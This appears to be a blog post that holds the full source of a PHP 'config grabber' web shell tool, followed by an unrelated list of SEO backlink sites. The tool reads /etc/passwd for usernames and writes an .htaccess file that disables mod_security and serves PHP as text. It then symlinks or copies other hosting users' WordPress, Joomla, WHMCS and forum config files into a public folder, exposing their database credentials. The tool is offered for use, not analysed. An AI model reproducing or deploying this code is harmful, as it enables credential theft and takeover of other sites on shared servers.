<style type=text/css>
.rules
{text-shadow:5px 5px 10px red;}
.owner
{text-shadow:5px 5px 10px orange;}
.mod
{text-shadow:5px 5px 10px white;}
.member
{text-shadow:5px 5px 10px blue;}
.guest
{text-shadow:5px 5px 10px green;}
.tags
{text-shadow:5px 5px 10px grey;}
.title
{text-shadow:5px 5px 10px purple;}
.numbers
{text-shadow:1px 5px 10px white;}
body {background-color: transparent;color: #FFFFFF;}
</style>
<br>
<br>
<center> <!-- IE doesn't like CSS Centering -->
<table border="0">
<table bgcolor="black" border="1">
<tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<th>
<br>
<span style="text-shadow:5px 5px 10px red;"><font size="7">YASSINOX CONFIG FUCKER</font></span>
</th>
</tr>
<td>
<table border="1" bgcolor="black" align="center">
<tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<th width="481" class="title"><span style="text-shadow:5px 5px 10px red;">Normal Grabber</span></th>
<th width="514" class="title"><span style="text-shadow:5px 5px 10px red;">Bypass Grabber</span></th>
</tr>
</tr><tr onmouseover="this.bgColor='#FF8000'" onmouseout="this.bgColor='#000000'">
<td>
<span style="font-weight: bold; color: blue;"> ~ Users ~</span><br><br>
<br>
<form method=post>
<textarea rows=10 cols=50 name=usern><?php
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<center><input type=submit name=submitn value="Grab It " /></form></center>
</td>
<td>
<table border="1" cellpadding="1" width="514" height="300" bgcolor="black"></td>
</tr>
<span style="font-weight: bold; color: blue;"> ~ Users ~</span><br><br>
<form method=post>
<textarea rows=10 cols=50 name=userb><?php
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<center><input type=submit name=submitb value="Bypass It " /></form></center>
</td>
</td>
</tr>
</table></table></table>
<td>
</center>
<?php
if(isset($_POST['submitn']))
{
mkdir('yassinoxnormal',0777); //This Will Make A Directory Where The config Will be
//-------------------------------------------------------------------------------------
$htaccess = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>"; // Htaccess By Mauritania Attacker <3
$htaccessfile = fopen("yassinoxnormal/.htaccess",'w');
fwrite($htaccessfile,$htaccess);
//-------------------------------------------------------------------------------------
$admin = explode("\n",$_POST['usern']);
$needconfig = array("wp-config.php","/blog/wp-config.php","wordpress/wp-config.php","wp/wp-config.php","site/wp-config.php","site/blog/wp-config.php","configuration.php","site/configuration.php","joomla/configuration.php","home/configuration.php","vb/includes/config.php","/includes/config.php","forum/includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","/include/config.php","/commun/config.php","/include/sql.php","/include/db.php","/db.php","/commun/sql.php","/common/db.php","/common/sql.php","/common/config.php");
foreach($admin as $admins )
{
$ad=trim($admins);
foreach($needconfig as $config)
{
$direct = "/home/".$ad."/public_html/".$config;
$import = "yassinoxnormal/".$ad."_".$config;
symlink($direct,$import);
}
}
echo '<center><span style="text-shadow:5px 5px 10px red;"><font size="4" color="black">--> <a href="yassinoxnormal/">Configuration Files</a> <--</font></span></center>';
}
?>
<?php
if(isset($_POST['submitb']))
{
mkdir('yassinoxbypass',0777); //This Will Make A Directory Where The config Will be
//-------------------------------------------------------------------------------------
$htaccess = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>"; // Htaccess By Mauritania Attacker <3
$htaccessfile = fopen("yassinoxbypass/.htaccess",'w');
fwrite($htaccessfile,$htaccess);
//-------------------------------------------------------------------------------------
$admin = explode("\n",$_POST['usern']);
$needconfig = array("wp-config.php","/blog/wp-config.php","wordpress/wp-config.php","wp/wp-config.php","site/wp-config.php","site/blog/wp-config.php","configuration.php","site/configuration.php","joomla/configuration.php","home/configuration.php","vb/includes/config.php","/includes/config.php","forum/includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","/include/config.php","/commun/config.php","/include/sql.php","/include/db.php","/db.php","/commun/sql.php","/common/db.php","/common/sql.php","/common/config.php");
foreach($admin as $admins )
{
$ad=trim($admins);
foreach($needconfig as $config)
{
$direct = "../../".$ad."/public_html/".$config;
$import = "yassinoxbypass/".$ad."_".$config;
copy($direct,$import);
}
}
echo '<center><span style="text-shadow:5px 5px 10px red;"><font size="4" color="black">--> <a href="yassinoxbypass/">Configuration Files</a> <--</font></span></center>';
}
?>
50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
Comments
Post a Comment